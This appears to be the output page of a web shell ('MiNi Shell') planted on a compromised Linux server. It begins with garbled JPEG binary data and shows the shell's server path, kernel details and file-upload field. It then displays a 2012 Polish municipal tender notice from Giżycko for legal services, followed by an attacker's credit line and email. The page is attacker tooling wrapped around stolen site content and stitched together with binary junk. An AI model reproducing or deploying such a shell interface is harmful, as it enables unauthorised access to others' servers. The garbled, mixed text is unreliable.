JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121102/232205-N-2012.html

<p class="kh_header"><b>Giżycko: Obsługa prawna Urzędu Miejskiego w Giżycku</b><br>
<b>Numer ogłoszenia: 232205 - 2012; data zamieszczenia: 02.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Giżycko , al. 1 Maja 14, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 73 24 111, 7324 143, faks 87 4285241.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gizycko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa prawna Urzędu Miejskiego w Giżycku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Obowiązkiem Wykonawcy będzie osobiste świadczenie pomocy prawnej w siedzibie Urzędu Miejskiego w Giżycku w ustalonych dniach  w godzinach pracy Urzędu 
-  poniedziałek: godz. 8.00 - 16.00, 
- wtorek - piątek: godz. 7.30 - 15.30 
w wymiarze:
 - Zakres I - nie mniej niż  12 godzin tygodniowo - minimum dwa razy w tygodniu (wtorek, czwartek),
- Zakres II - nie mniej niż 12 godzin tygodniowo - minimum trzy razy w tygodniu (poniedziałek, środa, piątek)
W przypadkach wymagających niezwłocznej konsultacji na wezwanie Zamawiającego.
Osobiste świadczenie wyłącza możliwość posługiwania się przez Wykonawcę osobami trzecimi (nie dotyczy zastępstwa przed sądami w sytuacjach incydentalnych). 
 Obsługa prawna w zakresie: ustawy z 6 lipca 1982 r. o radcach prawnych (tekst jednolity Dz. U.  z 2010 r. Nr 10, poz. 65 z późniejszymi zmianami) / ustawy z 26 maja 1982 r. Prawo o adwokaturze (tekst jednolity Dz. U. z 2009 r. nr 146 poz. 1188 z późniejszymi zmianami) /  ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (Dz. U. 126, poz. 1069 
z późniejszymi zmianami) polegać będzie w szczególności na: 
1.  udzielaniu bieżących porad prawnych oraz konsultacji pracownikom Urzędu Miejskiego w Giżycku oraz Radnym Rady Miejskiej w Giżycku w zakresie  wykonywanych przez nich zadań; 
2. wydawaniu ustnych i pisemnych opinii prawnych w terminie max. 3 dni od zgłoszenia, a w przypadku spraw o wysokim stopniu złożoności w terminie odrębnie uzgodnionym z Zamawiającym;
3. opiniowaniu pod względem formalno - prawnym projektów zawieranych umów cywilnoprawnych, 
4. opiniowaniu projektów wydawanych przez Radę Miejską i Burmistrza Miasta aktów normatywnych;
5. informowaniu pracowników o zmianach w obowiązującym stanie prawnym 
w zakresie dotyczącym funkcjonowania Urzędu;
6. obsłudze prawnej Sesji Rady Miejskiej w Giżycku - co najmniej raz 
w miesiącu; 
7. przygotowywanie projektów wystąpień do sądów, organów ścigania i innych instytucji w związku z prowadzonymi postępowaniami administracyjnymi, cywilnymi i karnymi; 
8. reprezentowanie Zamawiającego poprzez zastępstwo prawne w postępowaniach przed sądami wszystkich instancji i innymi organami orzekającymi na podstawie indywidualnych pełnomocnictw wystawionych przez Zamawiającego.
Na czas obecności w siedzibie Zamawiającego Wykonawca będzie miał zapewnione odpowiednie pomieszczenie i dostęp do wszystkich materiałów niezbędnych do prawidłowego wykonania usługi. 
  Gmina Miejska Giżycko realizuje zadania wynikające z ustawy z dnia 08 marca 
1990 r. o samorządzie gminnym  (tekst jednolity Dz. U. z 2010 r. Nr 142 poz. 1591 
z późniejszymi zmianami) oraz z ustaw kompetencyjnych. 

Zamawiający przewiduje składanie ofert częściowych - Zakres I i/lub Zakres II. 

Zakres I - obsługa prawna: 
a). Rady Miejskiej, 
b). Wydziału Mienia, 
c). Architekta Miejskiego, 
d). Wydziału Spraw Obywatelskich, 
e). Urzędu Stanu Cywilnego,

Zakres II - obsługa prawna:
a). Rady Miejskiej, 
b). Wydziału Ogólnego,
c). Wydziału Finansowo - Księgowego, 
d). Wydziału Promocji, 
e). Wydziału Techniczno - Inwestycyjnego, 
f). Pionu Ochrony, 
g). Straż Miejska, 
h). Rewidenta finansowego, 
i). Audytora wewnętrznego
 Szczegółowy zakres działań poszczególnych komórek organizacyjnych określa aktualny Regulamin Organizacyjny Urzędu Miejskiego w Giżycku. (załącznik do Zarządzenia Nr 169/2009 z dnia 16 stycznia 2009 r. 
http://www.bip.gizycko.pl/wiadomosci/1209/wiadomosc/81446/zarzadzenie_nr_1692009_burmistrza_miasta_gizycka_z_dnia_16_stycz 
W przypadku zmiany struktury organizacyjnej Urzędu Zamawiający, w uzgodnieniu 
z Wykonawcą, dokona zmiany Zakresów I i/lub II uwzględniając obecnie obowiązujący rzeczowy podział zadań.  
    Na podstawie art. 36 ust. 5 ustawy Prawo zamówień publicznych, Zamawiający zastrzega, że ze względu na specyfikę przedmiotu zamówienia, niniejsze zamówienie nie może być w całości lub części powierzone podwykonawcom.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis na listę radców prawnych lub  listę adwokatów, zgodnie z ustawą z dnia 6 lipca 1982 r. o radcach prawnych (t. j.: Dz. U. z 2010 r., Nr 10, poz. 65 z późn. zm.) lub ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (t. j.: Dz. U. z 2009 r., Nr 146, poz. 1188 z późn. zm.) lub posiada wpis na listę prawników zagranicznych, prowadzoną przez okręgową radę adwokacką lub radę okręgowej izby radców prawnych [zgodnie z ustawą z dnia 5 lipca 2002 r. 
o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (Dz. U. z 2002 r., Nr 126, poz. 1069 z późn. zm.)]</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku  świadczeń okresowych lub ciągłych również wykonuje, co najmniej jedną usługę polegającą na świadczeniu w sposób ciągły pomocy prawnej na rzecz jednostki samorządu terytorialnego lub jej jednostek organizacyjnych, przez okres co najmniej 24 miesięcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wystarczającym pozostanie złożone oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wystarczającym pozostanie złożone oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wystarczającym pozostanie złożone oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 upzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy (Załącznik nr 3a i/lub Załącznik 3b)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie zawodowe - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany umowy wymagają zachowania formy pisemnej, pod rygorem nieważności i są dopuszczalne tylko w granicach uregulowań art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r. nr 113, poz. 759 z późniejszymi zmianami), 
2. Zmiana postanowień niniejszej umowy wymaga zgody obu stron wyrażonej na piśmie pod rygorem nieważności. 
3. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy. Zmiany mogą dotyczyć: 
a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gizycko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Ogólny (pok. 107) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 
11-500 Giżycko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 10:00, miejsce: Sekretariat (pok. 104) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 11-500 Giżycko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obsługa prawna Urzędu Miejskiego w Giżycku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 
Obowiązkiem Wykonawcy będzie osobiste świadczenie pomocy prawnej w siedzibie Urzędu Miejskiego w Giżycku w ustalonych dniach  w godzinach pracy Urzędu 
-  poniedziałek: godz. 8.00 - 16.00, 
- wtorek - piątek: godz. 7.30 - 15.30 
w wymiarze:
 - Zakres I - nie mniej niż  12 godzin tygodniowo - minimum dwa razy w tygodniu (wtorek, czwartek)
W przypadkach wymagających niezwłocznej konsultacji na wezwanie Zamawiającego.
Osobiste świadczenie wyłącza możliwość posługiwania się przez Wykonawcę osobami trzecimi (nie dotyczy zastępstwa przed sądami w sytuacjach incydentalnych). 
 Obsługa prawna w zakresie: ustawy z 6 lipca 1982 r. o radcach prawnych (tekst jednolity Dz. U.  z 2010 r. Nr 10, poz. 65 z późniejszymi zmianami) / ustawy z 26 maja 1982 r. Prawo o adwokaturze (tekst jednolity Dz. U. z 2009 r. nr 146 poz. 1188 z późniejszymi zmianami) /  ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (Dz. U. 126, poz. 1069 z późniejszymi zmianami) polegać będzie w szczególności na: 
1. udzielaniu bieżących porad prawnych oraz konsultacji pracownikom Urzędu Miejskiego w Giżycku oraz Radnym Rady Miejskiej w Giżycku w zakresie  wykonywanych przez nich zadań; 
2. wydawaniu ustnych i pisemnych opinii prawnych w terminie max. 3 dni od zgłoszenia, a w przypadku spraw o wysokim stopniu złożoności w terminie odrębnie uzgodnionym z Zamawiającym;
3. opiniowaniu pod względem formalno - prawnym projektów zawieranych umów cywilnoprawnych, 
4. opiniowaniu projektów wydawanych przez Radę Miejską i Burmistrza Miasta aktów normatywnych;
5. informowaniu pracowników o zmianach w obowiązującym stanie prawnym 
w zakresie dotyczącym funkcjonowania Urzędu;
6. obsłudze prawnej Sesji Rady Miejskiej w Giżycku - co najmniej raz 
w miesiącu; 
7. przygotowywanie projektów wystąpień do sądów, organów ścigania i innych instytucji w związku z prowadzonymi postępowaniami administracyjnymi, cywilnymi i karnymi; 
8. reprezentowanie Zamawiającego poprzez zastępstwo prawne w postępowaniach przed sądami wszystkich instancji i innymi organami orzekającymi na podstawie indywidualnych pełnomocnictw wystawionych przez Zamawiającego.
Na czas obecności w siedzibie Zamawiającego Wykonawca będzie miał zapewnione odpowiednie pomieszczenie i dostęp do wszystkich materiałów niezbędnych do prawidłowego wykonania usługi. 
  Gmina Miejska Giżycko realizuje zadania wynikające z ustawy z dnia 08 marca 
1990 r. o samorządzie gminnym  (tekst jednolity Dz. U. z 2010 r. Nr 142 poz. 1591 
z późniejszymi zmianami) oraz z ustaw kompetencyjnych. 

Zakres I - obsługa prawna: 
a). Rady Miejskiej, 
b). Wydziału Mienia, 
c). Architekta Miejskiego, 
d). Wydziału Spraw Obywatelskich, 
e). Urzędu Stanu Cywilnego.

   Szczegółowy zakres działań poszczególnych komórek organizacyjnych określa aktualny Regulamin Organizacyjny Urzędu Miejskiego w Giżycku (załącznik do Zarządzenia Nr 169/2009 z dnia 16 stycznia 2009 r. 
http://www.bip.gizycko.pl/wiadomosci/1209/wiadomosc/81446/zarzadzenie_nr_1692009_burmistrza_miasta_gizycka_z_dnia_16_stycz 
W przypadku zmiany struktury organizacyjnej Urzędu Zamawiający, w uzgodnieniu 
z Wykonawcą, dokona zmiany Zakresów I i/lub II uwzględniając obecnie obowiązujący rzeczowy podział zadań.  
Na podstawie art. 36 ust. 5 ustawy Prawo zamówień publicznych, Zamawiający zastrzega, że ze względu na specyfikę przedmiotu zamówienia, niniejsze zamówienie nie może być w całości lub części powierzone podwykonawcom.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa prawna Urzędu Miejskiego w Giżycku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 
Obowiązkiem Wykonawcy będzie osobiste świadczenie pomocy prawnej w siedzibie Urzędu Miejskiego w Giżycku w ustalonych dniach  w godzinach pracy Urzędu 
-  poniedziałek: godz. 8.00 - 16.00, 
- wtorek - piątek: godz. 7.30 - 15.30 
w wymiarze:
 - Zakres II - nie mniej niż 12 godzin tygodniowo - minimum trzy razy w tygodniu (poniedziałek, środa, piątek)
W przypadkach wymagających niezwłocznej konsultacji na wezwanie Zamawiającego.
Osobiste świadczenie wyłącza możliwość posługiwania się przez Wykonawcę osobami trzecimi (nie dotyczy zastępstwa przed sądami w sytuacjach incydentalnych). 
 Obsługa prawna w zakresie: ustawy z 6 lipca 1982 r. o radcach prawnych (tekst jednolity Dz. U.  z 2010 r. Nr 10, poz. 65 z późniejszymi zmianami) / ustawy z 26 maja 1982 r. Prawo o adwokaturze (tekst jednolity Dz. U. z 2009 r. nr 146 poz. 1188 z późniejszymi zmianami) /  ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (Dz. U. 126, poz. 1069 z późniejszymi zmianami) polegać będzie w szczególności na: 
1. udzielaniu bieżących porad prawnych oraz konsultacji pracownikom Urzędu Miejskiego w Giżycku oraz Radnym Rady Miejskiej w Giżycku w zakresie  wykonywanych przez nich zadań; 
2. wydawaniu ustnych i pisemnych opinii prawnych w terminie max. 3 dni od zgłoszenia, a w przypadku spraw o wysokim stopniu złożoności w terminie odrębnie uzgodnionym z Zamawiającym;
3. opiniowaniu pod względem formalno - prawnym projektów zawieranych umów cywilnoprawnych, 
4. opiniowaniu projektów wydawanych przez Radę Miejską i Burmistrza Miasta aktów normatywnych;
5. informowaniu pracowników o zmianach w obowiązującym stanie prawnym 
w zakresie dotyczącym funkcjonowania Urzędu;
6. obsłudze prawnej Sesji Rady Miejskiej w Giżycku - co najmniej raz 
w miesiącu; 
7. przygotowywanie projektów wystąpień do sądów, organów ścigania i innych instytucji w związku z prowadzonymi postępowaniami administracyjnymi, cywilnymi i karnymi; 
8. reprezentowanie Zamawiającego poprzez zastępstwo prawne w postępowaniach przed sądami wszystkich instancji i innymi organami orzekającymi na podstawie indywidualnych pełnomocnictw wystawionych przez Zamawiającego.
 Na czas obecności w siedzibie Zamawiającego Wykonawca będzie miał zapewnione odpowiednie pomieszczenie i dostęp do wszystkich materiałów niezbędnych do prawidłowego wykonania usługi. 
 Gmina Miejska Giżycko realizuje zadania wynikające z ustawy z dnia 08 marca 
1990 r. o samorządzie gminnym  (tekst jednolity Dz. U. z 2010 r. Nr 142 poz. 1591 
z późniejszymi zmianami) oraz z ustaw kompetencyjnych. 

Zakres II - obsługa prawna:
a). Rady Miejskiej, 
b). Wydziału Ogólnego,
c). Wydziału Finansowo - Księgowego, 
d). Wydziału Promocji, 
e). Wydziału Techniczno - Inwestycyjnego, 
f). Pionu Ochrony, 
g). Straż Miejska, 
h). Rewidenta finansowego, 
i). Audytora wewnętrznego
 Szczegółowy zakres działań poszczególnych komórek organizacyjnych określa aktualny Regulamin Organizacyjny Urzędu Miejskiego w Giżycku (załącznik do Zarządzenia Nr 169/2009 z dnia 16 stycznia 2009 r. 
http://www.bip.gizycko.pl/wiadomosci/1209/wiadomosc/81446/zarzadzenie_nr_1692009_burmistrza_miasta_gizycka_z_dnia_16_stycz 
W przypadku zmiany struktury organizacyjnej Urzędu Zamawiający, w uzgodnieniu 
z Wykonawcą, dokona zmiany Zakresów I i/lub II uwzględniając obecnie obowiązujący rzeczowy podział zadań.  
 Na podstawie art. 36 ust. 5 ustawy Prawo zamówień publicznych, Zamawiający zastrzega, że ze względu na specyfikę przedmiotu zamówienia, niniejsze zamówienie nie może być w całości lub części powierzone podwykonawcom.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com